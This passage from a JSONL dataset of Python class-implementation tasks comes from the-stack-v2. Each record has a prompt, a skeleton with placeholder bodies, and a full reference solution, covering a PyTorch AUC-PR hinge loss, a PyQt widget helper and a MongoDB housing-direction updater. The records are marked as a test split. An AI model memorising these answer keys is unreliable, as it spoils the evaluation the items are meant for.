loss per input/target element instead", "name": "forward", "signature": "def forward(self, logits, targets, reduce=True, size_average=True, weights=None)"}, {"docstring": "Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels", "name": "_prepare_labels_weights", "signature": "def _prepare_labels_weights(logits, targets, weights=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003453", "prompt": "Implement the Python class `AUCPRHingeLoss` described below.\n\nClass description:\narea under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\n\nMethod signatures and docstrings:\n- def __init__(self, num_classes=1, num_anchors=20): Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\n- def forward(self, logits, targets, reduce=True, size_average=True, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\n- def _prepare_labels_weights(logits, targets, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels", "prompted_full_text": "Implement the Python class `AUCPRHingeLoss` described below.\n\nClass description:\narea under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\n\nMethod signatures and docstrings:\n- def __init__(self, num_classes=1, num_anchors=20): Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\n- def forward(self, logits, targets, reduce=True, size_average=True, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\n- def _prepare_labels_weights(logits, targets, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\n\n<|skeleton|>\nclass AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n <|body_0|>\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\"\"\"\n <|body_1|>\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n<|end_body_0|>\n\n<|body_start_1|>\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n<|end_body_1|>\n\n<|body_start_2|>\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n<|end_body_2|>\n", "revision_id": "ed667918b78184c658361b3bccf2d23cca1c76f3", "skeleton": "<|skeleton|>\nclass AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n <|body_0|>\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\"\"\"\n <|body_1|>\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\"\"\"\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/model/loss.py", "source_repo": "lming24/kaggle-melanoma", "split": "test", "star_events_count": 0} {"blob_id": "dd340b5d993d6db71c3367fb32ecc19a7ed223aa", "bodies": ["widgets = []\ntextEdit = QLineEdit()\ntextEdit.setText(std_prm['name'])\nwidgets.append(textEdit)\ninputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\nwidgets.append(inputWidget)\nstd_prm['name widget'] = textEdit\nstd_prm['widget'] = inputWidget\nreturn widgets", "if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\nelif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])"], "bodies_text": "<|body_start_0|>\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n<|end_body_1|>\n", "class_docstring": "This class is used for the methods needed for presenting the StdPrm", "class_name": "StdPrmInput", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n <|body_0|>\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000015", "length_bytes": 13518, "license_type": "no_license", "methods": [{"docstring": "- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented", "name": "widgets", "signature": "def widgets(std_prm: Parameter) -> List[QWidget]"}, {"docstring": "Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget", "name": "updateWidget", "signature": "def updateWidget(parameter: Parameter)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004336", "prompt": "Implement the Python class `StdPrmInput` described below.\n\nClass description:\nThis class is used for the methods needed for presenting the StdPrm\n\nMethod signatures and docstrings:\n- def widgets(std_prm: Parameter) -> List[QWidget]: - This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\n- def updateWidget(parameter: Parameter): Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget", "prompted_full_text": "Implement the Python class `StdPrmInput` described below.\n\nClass description:\nThis class is used for the methods needed for presenting the StdPrm\n\nMethod signatures and docstrings:\n- def widgets(std_prm: Parameter) -> List[QWidget]: - This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\n- def updateWidget(parameter: Parameter): Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\n\n<|skeleton|>\nclass StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n <|body_0|>\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n<|end_body_1|>\n", "revision_id": "dfc30621bf330c300bca75103e7f8bca8b7a8d58", "skeleton": "<|skeleton|>\nclass StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n <|body_0|>\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n", "source": "the_stack_v2_python_sparse", "source_path": "AI Project/Project/UserInterface/Parameter.py", "source_repo": "IlanHindy/AI-Learn", "split": "test", "star_events_count": 0} {"blob_id": "e3b44eeec58d1ff8bca1901a4eb06dfc27450357", "bodies": ["word_list = []\nfor k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\nif len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)", "query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\nif room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\ndirection = cls.format_direction(direction)\nif direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})"], "bodies_text": "<|body_start_0|>\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n<|end_body_0|>\n\n<|body_start_1|>\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\n direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Direction", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Direction:\n\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n <|body_0|>\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n<|end_body_0|>\n\n<|body_start_1|>\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\n direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000016", "length_bytes": 2714, "license_type": "no_license", "methods": [{"docstring": ":param direction: 朝向 :return: 有效朝向", "name": "format_direction", "signature": "def format_direction(cls, direction)"}, {"docstring": ":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号", "name": "update_direction", "signature": "def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None)"}], "n_methods": 2, "prompt": "Implement the Python class `Direction` described below.\n\nClass description:\nImplement the Direction class.\n\nMethod signatures and docstrings:\n- def format_direction(cls, direction): :param direction: 朝向 :return: 有效朝向\n- def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None): :param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号", "prompted_full_text": "Implement the Python class `Direction` described below.\n\nClass description:\nImplement the Direction class.\n\nMethod signatures and docstrings:\n- def format_direction(cls, direction): :param direction: 朝向 :return: 有效朝向\n- def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None): :param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\n\n<|skeleton|>\nclass Direction:\n\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n <|body_0|>\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n<|end_body_0|>\n\n<|body_start_1|>\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\n direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n<|end_body_1|>\n", "revision_id": "808cb78fc3887f35bf838d77d62308fce9e6aa5d", "skeleton": "<|skeleton|>\nclass Direction:\n\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n <|body_0|>\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Direction:\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\n direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n", "source": "the_stack_v2_python_sparse", "source_path": "hilder_pretreatment/raise_coverage/house_raise/direction_update.py", "source_repo": "pjkui/githubproject", "split": "test", "star_events_count": 0} {"blob_id": "a5fdf182d391ef1b00713fabb23dc8abbc048892", "bodies": ["resp = get_model_list_method(*get_method_args, **get_method_kwargs)\nif not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\nif resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\nreturn resp.entity", "if not model_filter:\n return model_list\nif filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. _filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\nfinal_list = []\nfor model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == cls.EXCLUSION_MODE:\n model_value = str(getattr(model, k))\n filter_value = model_filter[k]\n if not excluded and model_value not in filter_value:\n final_list.append(model)\n break\n else:\n excluded = True\nreturn final_list", "if randomize:\n shuffle(dataset_list)\nif max_datasets:\n dataset_list = DatasetList(dataset_list[:max_datasets])\nreturn dataset_list"], "bodies_text": "<|body_start_0|>\n resp = get_model_list_method(*get_method_args, **get_method_kwargs)\n if not resp.ok:\n raise DatasetGeneratorError('Request for list of {0} during data-driven-test setup failed with an HTTP {1} ERROR'.format(model_type_name, resp.status_code))\n if resp.entity is None:\n raise DatasetGeneratorError('Unable to deserialize list of {0} during data-driven-test setup. API responded with an HTTP {1}'.format(model_type_name, resp.status_code))\n return resp.entity\n<|end_body_0|>\n\n<|body_start_1|>\n if not model_filter:\n return model_list\n if filter_mode not in [cls.INCLUSION_MODE, cls.EXCLUSION_MODE]:\n raise Exception(\"Invalid filter_mode {0}. _filter_model_list must be called with a mode set to either 'inclusion' or 'exclusion'.\".format(filter_mode))\n final_list = []\n for model in model_list:\n excluded = False\n for k in model_filter:\n if filter_mode == cls.INCLUSION_MODE:\n if str(getattr(model, k)) in model_filter[k]:\n final_list.append(model)\n break\n elif filter_mode == 